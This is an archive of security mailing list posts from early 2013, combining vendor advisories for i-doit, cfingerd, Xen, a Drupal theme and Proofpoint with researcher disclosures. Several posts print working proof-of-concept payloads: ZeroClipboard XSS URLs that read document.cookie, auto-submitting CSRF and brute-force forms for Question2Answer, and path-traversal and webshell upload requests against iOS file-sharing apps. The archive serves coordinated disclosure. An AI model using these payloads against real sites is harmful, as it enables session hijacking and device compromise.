[Full-disclosure] CVE-2013-1413
# # # COMPASS SECURITY ADVISORY http://www.csnc.ch/ # # # # CVE ID : CVE-2013-1413 # CSNC ID: CSNC-2013-003 # Product: i-doit # Vendor: synetics Gesellschaft für Systemintegration mbH # Subject: Cross-site Scripting - XSS # Risk:High # Effect: Remotely exploitable # Author: Stephan Rickauer (stephan.ricka...@csnc.ch) # Date:March 1st 2013 # # Introduction: - Compass Security AG discovered multiple security flaws in the i-doit CMDB web application. Vulnerable: --- - i-doit version prior to 1.0 Pro and 0.9.9-7 Open - i-doit version after 1.0 Pro with disabled input filter (by default) Patches: Version 1.0.2 Pro has received a new configure option to 'sanitize user input' which defaults to off and has to be manually enabled. Description: The i-doit web application does not properly encode output of user data in various places. Exploiting this vulnerability leads to so-called cross-site scripting (XSS) and allows execution of JavaScript code in the context of the user's session, e.g. to impersonate logged-in i-doit CMDB users. Milestones: --- 2013-01-20 Vulnerability discovered 2013-01-20 Vendor notified 2013-01-20 CVE requested at MITRE.org 2013-01-21 Vendor contact established, provided with technical details 2013-01-21 CVE-ID assigned by MITRE 2013-01-21 Acknowledgement of vulnerability by vendor and agreement of advisory release schedule 2013-01-28 More XSS vulnerabilites identified, vendor updated 2013-02-20 Release of patched vendor software 2013-03-01 Public release of advisory References: --- http://www.i-doit.org http://www.i-doit.com http://www.csnc.ch ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] list patch
Changelog: - Remove support for a feature deprecated three years ago. - See http://www.grok.org.uk/full-disclosure/fdfaq.html#moderation Cheers - John ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2635-1] cfingerd security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2635-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso March 1, 2013 http://www.debian.org/security/faq - - Package: cfingerd Vulnerability : buffer overflow Problem type : remote Debian-specific: yes CVE ID : CVE-2013-1049 Debian Bug : 700098 Malcolm Scott discovered a remote-exploitable buffer overflow in the rfc1413 (ident) client of cfingerd, a configurable finger daemon. This vulnerability was introduced in a previously applied patch to the cfingerd package in 1.4.3-3. For the stable distribution (squeeze), this problem has been fixed in version 1.4.3-3+squeeze1. For the testing distribution (wheezy), this problem has been fixed in version 1.4.3-3.1. For the unstable distribution (sid), this problem has been fixed in version 1.4.3-3.1. We recommend that you upgrade your cfingerd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlEwkvcACgkQHYflSXNkfP9JrQCgn9OvGbuCNaeAhGvNXN1ixB8t pNMAn3DnIkSK+l7PT74quAXdschWlyRP =BouY -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-031 - Premium Responsive theme - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1929508 * Advisory ID: DRUPAL-SA-CONTRIB-2013-031 * Project: Premium Responsive [1] (third-party theme) * Version: 7.x * Date: 2013-February-27 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This third-party contributed theme change Drupal's interface. The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage leading to a Cross Site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Premium Responsive versions prior to 7.x-1.6 Drupal core is not affected. If you do not use the contributed Premium Responsive [4] theme, there is nothing you need to do. SOLUTION Install the latest version: * Premium Responsive 7.x-1.6 [5] Also see the Premium Responsive [6] project page. REPORTED BY - * Greg Knaddison [7] of the Drupal Security Team FIXED BY * saran.quardz [8] the theme maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/responsive [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/responsive [5] http://drupal.org/node/1730752 [6] http://drupal.org/project/responsive [7] http://drupal.org/user/36762 [8] http://drupal.org/user/1031208 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/91990 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2636-1] xen security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2636-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff March 01, 2013 http://www.debian.org/security/faq - - Package: xen Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2012-4544 CVE-2012-5511 CVE-2012-5634 CVE-2013-0153 Debian Bug : Multiple vulnerabilities have been discovered in the Xen hypervisor. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2012-4544 Insufficient validation of kernel or ramdisk sizes in the Xen PV domain builder could result in denial of service. CVE-2012-5511 Several HVM control operations performed insufficient validation of input, which could result in denial of service through resource exhaustion. CVE-2012-5634 Incorrect interrupt handling when using VT-d hardware could result in denial of service. CVE-2013-0153 Insufficient restriction of interrupt access could result in denial of service. For the stable distribution (squeeze), these problems have been fixed in version 4.0.1-5.7. For the testing distribution (wheezy), these problems have been fixed in version 4.1.4-2. For the unstable distribution (sid), these problems have been fixed in version 4.1.4-2. We recommend that you upgrade your xen packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlEw/3YACgkQXm3vHE4uylrX+ACgtVk1Pg/7Op/sVbMAmliP7WM/ G38An2vc8pHv2LM2h3q2Sz2VRKkJhPVV =/k4L -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django and aCMS
Hello list!
I'm resending my letter from February 23, 2013 (since FD was not working
that day).
After my previous list of vulnerable software with ZeroClipboard.swf, here
is a list of software with ZeroClipboard10.swf. These are Cross-Site
Scripting vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django
and aCMS.
Earlier I've wrote about Cross-Site Scripting vulnerabilities in
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote
that this is very widespread flash-file and it's placed at tens of thousands
of web sites. And it's used in hundreds of web applications. Among them are
em-shorty, RepRapCalculator, Fulcrum (CMS), Django and aCMS. And there are
many other vulnerable web applications with ZeroClipboard10.swf (some of
them also contain ZeroClipboard.swf).
-
Affected products:
-
Vulnerable are the next web applications with ZeroClipboard:
em-shorty 0.5.0 and previous versions.
RepRapCalculator.
Fulcrum - all versions of this CMS.
Django - there are multiple web sites on Django framework (particularly
Django 1.3.1 and Djangoplicity) with ZeroClipboard.
aCMS 1.0.
Both XSS vulnerabilities in ZeroClipboard are fixed in latest version (by
new developers) ZeroClipboard 1.1.7. All developers should update swf-file
in their software.
--
Details:
--
Cross-Site Scripting (WASC-08):
XSS via id parameter and XSS via copying payload into clipboard (as
described in the first advisory).
em-shorty:
http://site/public/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight
RepRapCalculator:
http://site/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight
http://site/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight
Fulcrum:
http://site/admin/lib/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight
http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight
http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight
Django (different web applications on Django framework):
Django 1.3.1:
http://site/media/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight
http://site/media/js/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight
Djangoplicity:
http://site/static/djangoplicity/js/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight
http://site/static/js/ZeroClipboard10.swfZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight
aCMS:
http://site/assets/swf/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight
Besides ZeroClipboard, in aCMS there is also Cumulus (tagcloud.swf),
vulnerabilities in which I've disclosed (and part of them was fixed) already
in 2009. About it you can read in the article XSS vulnerabilities in 34
millions flash files
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html)
http://site/assets/swf/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E
Best wishes regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] BF, IAA and CSRF vulnerabilities in Question2Answer
Hello list! These are Brute Force, Insufficient Anti-automation and Cross-Site Request Forgery vulnerabilities in Question2Answer. This is the first part of vulnerabilities in this web application. - Affected products: - Vulnerable are all versions of Question2Answer (tested in version 1.5.3). As developer informed me, in version Q2A 1.6 he's planning to add protection against CSRF (see Timeline). And in January he has added this protection into the last dev-version of Q2A (http://www.question2answer.org/question2answer-dev-latest.zip). So before official release of Q2A 1.6 people can use this dev-version. -- Details: -- Brute Force (WASC-11): In login form (http://site/login) there is no protection from Brute Force attacks. Exploit: http://websecurity.com.ua/uploads/2013/Question2Answer%20BF.html body onLoad=document.hack.submit() form name=hack action=http://site/login; method=post input type=hidden name=emailhandle value=1 input type=hidden name=password value=1 input type=hidden name=remember value=1 input type=hidden name=dologin value=1 /form /body Insufficient Anti-automation (WASC-21): At contact page (http://site/feedback) there is no protection from automated requests. Exploit: http://websecurity.com.ua/uploads/2013/Question2Answer%20IAA.html body onLoad=document.hack.submit() form name=hack action=http://site/feedback; method=post input type=hidden name=message value=test input type=hidden name=name value=test input type=hidden name=email value=test input type=hidden name=dofeedback value=1 /form /body Cross-Site Request Forgery (WASC-09): There is no protection against CSRF attacks in login (http://site/login) and logout (http://site/logout) functionalities, and on other pages (there is no protection against CSRF in the system at all). In the next advisory I'll show example of CSRF, which allows to occupy admin account. Lack of captcha in login form (http://site/login) can be used for different attacks - for CSRF-attack to login into account (remote login - to conduct attacks on vulnerabilities inside of account), for above-mentioned Brute Force, for phishing and other automated attacks. Which you can read about in the article Attacks on unprotected login forms (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html). Timeline: 2012.11.27 - announced at my site. 2012.11.30 - informed developer (about the first part of the holes). 2012.12.01 - informed developer (about the second part of the holes). 2012.12 - during December I've spoke with developer about these holes and convinced him to fix CSRF holes. 2013.01.17 - developer informed about plans to add protection against CSRF into Q2A 1.6 (it'll be released in 2013) and that he added it to the last dev-version of Q2A. 2013.02.28 - disclosed at my site (http://websecurity.com.ua/6185/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] USB Disk File Transfer v1.3.1 - File Include Arbitrary File Upload Vulnerability
Title:
==
USB Disk File Transfer v1.3.1 - File Include Arbitrary File Upload
Vulnerability
Date:
=
2013-02-20
References:
===
http://www.vulnerability-lab.com/get_content.php?id=881
VL-ID:
=
881
Common Vulnerability Scoring System:
5.3
Introduction:
=
USB Disk File Transfer allows to store, view and manage files on your iPhone,
iPad or iPod touch. You can connect from any
computer over the Wi-Fi network and transfer files. Access to your Dropbox,
Box, Google Drive or SkyDrive account to upload,
download files and more. Also, exchange files between iPhone, iPhone or iPod
touch, using wifi or bluetooth.
USB Disk file Transfer features document viewer, PDF reader, music player,
video player, image viewer, text editor, file
manager and supports ZIP and RAR.
Supported files: AVI, FLV, DIVX, ZIP, RAR, Rx, PDF, MP3, M4P, AAC, WAV, M4A,
MPV, M4V, MP4, MOV, 3GP, DOC, DOCX, XLS, XLSX, PPSX,
PPTX, PPS, PPT, RTF, PAGES, NUMBERS, KEY, JPG, JPEG, PNG, GIF, BMP, PCX, TIFF,
TIF, BMPF, ICO, CUR, XBM, HTML, TXT,
text files like: C, M, H,...
(Copy of the Homepage:
https://itunes.apple.com/us/app/usb-disk-file-transfer/id516927225 )
Abstract:
=
The Vulnerability Laboratory Research Team discovered a file include web
vulnerability in the mobile USB Disk File Transfer v1.3.1 app for the apple
ipad iphone.
Report-Timeline:
2013-02-20: Public Disclosure
Status:
Published
Affected Products:
==
Apple
Product: USB Disk File Transfer 1.3.1
Exploitation-Technique:
===
Remote
Severity:
=
High
Details:
A local file include web vulnerability via POST request method is detected in
the mobile USB Disk File Transfer v1.3.1 app for the apple ipad iphone.
The vulnerability allows remote attackers via POST method to inject local app
webserver folders to request unauthorized local webserver files.
The vulnerbility is located in the upload file module of the webserver
(http://192.168.0.102:8080) when processing to load a manipulated
name or path via POST. The execution of the injected path or name of the file
request will occur when the attacker is processing to watch
the file dir listing on the main index site.
Exploitation of the vulnerability requires no user interaction and can be done
without privileged application user account (no password standard).
Successful exploitation of the vulnerability results in unauthorized path or
file access via local file or path include attack.
Vulnerable Application(s):
[+] USB Disk File Transfer v1.3.1 - ITunes or
AppStore (Apple)
Vulnerable Module(s):
[+] File Upload (Web Server) [Remote]
Vulnerable Parameter(s):
[+] name
[+] path
Affected Module(s):
[+] File Dir Index Listing
Proof of Concept:
=
The local file include web vulnerability can be exploited by remote attackers
without privileged application user account and
also without required user interaction. For demonstration or reproduce ...
PoC:
http://192.168.0.102:8080/files/?_=[FILE OR PATH INCLUDE VULNERABILITY!]
Review: Index Listing - Name Path
{currentDir:,files:[{name:[FILE INCLUDE
VULNERABILITY!].png,tam:27.3 KB,date:18.02.13 23:18,
type:FILE,path:[PATH INCLUDE
VULNERABILITY!.png,id:0},{name:8765434.png,tam:228.5
KB,date:18.02.13
23:23,type:FILE,path:8765434.png,id:1}]}
Manually steps to reproduce ...
1. Start the application or scan for a available application
2. Visit the web interfact by opening the following network ip
192.168.0.102:8080 in your browser
3. Start the your session tamper to manipulate the next POST request
4. Choose a file to upload and activate the tamper
5. Replace the path or name values with your own local app path or local file
to request after sending
6. Send the data to the webserver via POST and watch the index listing to
provoke the execution out of the file dir listing (name path)
7. Successful reproduced!
Reference(s):
http://192.168.0.102:8080/
Risk:
=
The security risk of the local file/path include web vulnerability via POST
request method is estimated as high(+).
Credits:
Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri
(b...@vulnerability-lab.com)
Disclaimer:
===
The information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the
[Full-disclosure] IPMap v2.5 iPad iPhone - File Upload Web Vulnerabilities
Title:
==
IPMap v2.5 iPad iPhone - File Upload Web Vulnerabilities
Date:
=
2013-02-18
References:
===
http://www.vulnerability-lab.com/get_content.php?id=866
VL-ID:
=
866
Common Vulnerability Scoring System:
6.3
Introduction:
=
IPMap - IP Address Lookup Details HTTP Wireless File Sharing with latest
WorldWide IP database FREE Monthly update.
Accuracy: Over 99.8% on a country level and 83% on a city level for the US
within a 25 mile radius.
Features:
Auto Detect Lookup
Your Real IP address
IP address Hostname
IP address Country Code
IP address Country Name
IP address Region
IP address Region Name
IP address City
IP address Postal Code
IP address Latitude
IP address Longitude
IP address Metro Code
IP address Area Code
IP location Map
HTTP Wireless File Sharing
iTunes File Sync
Web Upload File Support
Customizable Background from your Photos Album
(Copy of the Homepage:
https://itunes.apple.com/us/app/ipmap-ip-address-lookup-details/id416041538 )
Abstract:
=
The Vulnerability Laboratory Research Team discovered an arbitrary file upload
vulnerability in the mobile IPMap v2.5 app for the apple ipad iphone.
Report-Timeline:
2013-02-18: Public Disclosure
Status:
Published
Affected Products:
==
Apple AppStore
Product: IPMap - iPad iPhone 2.5
Exploitation-Technique:
===
Remote
Severity:
=
Critical
Details:
A local file include and arbitrary file upload web vulnerability via POST
request method is detected in the mobile IPMap v2.5 app
for the apple ipad iphone. The vulnerability allows remote attackers via POST
method to inject local app webserver folders to
request unauthorized local webserver files.
1.1
The main vulnerbility is located in the upload file script of the webserver
(http://192.168.0.10:6123/) when processing to load a manipulated
filename via POST request method. The execution of the injected path or file
request will occur when the attacker is watching the file index listing
of the wifi web application web-server.
1.2
Remote attackers can also unauthorized implement mobile webshells by using
multiple file extensions (pentest.php.js.gif) when processing to
upload (submit) via POST request method. The attacker uploads a file with a
double extension or multiple extensions and access the file in the
secound step via directory webserver dir listing to compromise the apple iphone
or ipad.
Exploitation of the local file include web vulnerability does not require user
interaction and also no privileged user account.
Successful exploitation of the web vulnerabilities results in app/service
manipulation and ipad or iphone compromise via file
include or unauthorized file (webshell) upload attacks.
Vulnerable Application(s):
[+] WiFilet v1.2 - ITunes or AppStore (Apple)
Vulnerable Module(s):
[+] File Upload via Submit (Web Server) [Remote]
Vulnerable Parameter(s):
[+] file filename
Affected Module(s):
[+] File Dir Index - Listing
Proof of Concept:
=
Both vulnerabilities can be exploited by remote attackers without privileged
application user account and also without required user interaction.
For demonstration or reproduce ...
1.1
PoC: (POST)
-307341202725627
Content-Disposition: form-data; name=file;
filename=../../../../cmdhometmp%00'.png
Content-Type: image/png
ÿØÿà
Review: File Dir Listing
htmlhead
meta http-equiv=content-type content=text/html;
charset=ISO-8859-1titleIPMap/title
stylebody { background-color:#f0f7fd;
font-family:Tahoma,Arial,Helvetica,sans-serif;
font-size:18x; padding:15px; margin-left:15%; margin-right:15%; }
/style/headbody
h2 style=background-color:#6897ff; margin:0; color:#fff; padding:5px 10px;
border: 1px outset #aaa;border-bottom: 0px;IPMap/h2
h4 style=background-color:#6897ff;margin:0; color:#fff; padding:0px 10px 8px
10px; border: 1px outset #aaa; border-top: 0px;
The following files are hosted live from the iPhone's Docs
folder./h4ptable style=text-align:center; border-color:#9bc0d2;
background:#f0f7fd; color:#4e697a; margin:0 auto; border=1 cellpadding=0
cellspacing=0tbodytr height=30td width=400
strongFile Name/strong/tdtd width=400strongFile
Info/strong/td/trtr height=30
tda
href=http://192.168.0.10:6123/../../../../cmdhometmp%00'%20%20%20%20iframe
src=../../../../cmdhometmp%00'%20%20%20%20
%20%20%20%20/a/tdtd(27.3 Kb, 2013-02-07 07:00:31
+)/td/tr/table/pform action=
method=post enctype=multipart/form-data name=form1
id=form1table border=0 cellpadding=0 cellspacing=0
style=text-align:center; margin:0 auto;tr
height=50td width=400labelupload fileinput
type=file name=file id=file //label/tdtd
width=400labelinput type=submit name=button
id=button value=Submit /
[Full-disclosure] Paypal Bug Bounty #5 - Persistent Web Vulnerability
Title: == Paypal Bug Bounty #5 - Persistent Web Vulnerability Date: = 2013-03-02 References: === http://www.vulnerability-lab.com/get_content.php?id=639 VL-ID: = 639 Common Vulnerability Scoring System: 3.3 Introduction: = PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract: = The Vulnerability Laboratory Research Team discovered a Web Vulnerability in the official Paypal Plaze ecommerce website application. Report-Timeline: 2012-06-30: Researcher Notification Coordination 2012-06-30: Vendor Notification 2012-07-02: Vendor Response/Feedback 2013-01-15: Vendor Fix/Patch 2013-02-03: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: A persistent input validation vulnerability is detected in the official Paypal ecommerce website content management system. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability is located in the Gift eCard module with the bound vulnerable titel or message parameters. Exploitation requires low user inter action or privileged application user account for local exploitation. Successful exploitation of the vulnerability can lead to session hijacking (admin), account steal via persistent web attack or stable (persistent) context manipulation. Vulnerable Module(s): [+] Send an eCard eCard/GiftCard Listing Vulnerable Parameter(s): [+] Greeting Title [+] Gretting Message Proof of Concept: = The persistent vulnerability can be exploited by remote attackers local privileged user accounts with low required user inter action. For demonstration or reproduce ... Review: Greeting Message -
[Full-disclosure] Proofpoint Protection Server Session Persistence
Proofpoint Protection Server Session Persistence A vulnerability exists in Proofpoint Protection Server (ver 4.0.7.67) where a session to the web admin interface is not terminated after the device reboots. Session should be terminated upon logout, especially if the device reboots. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
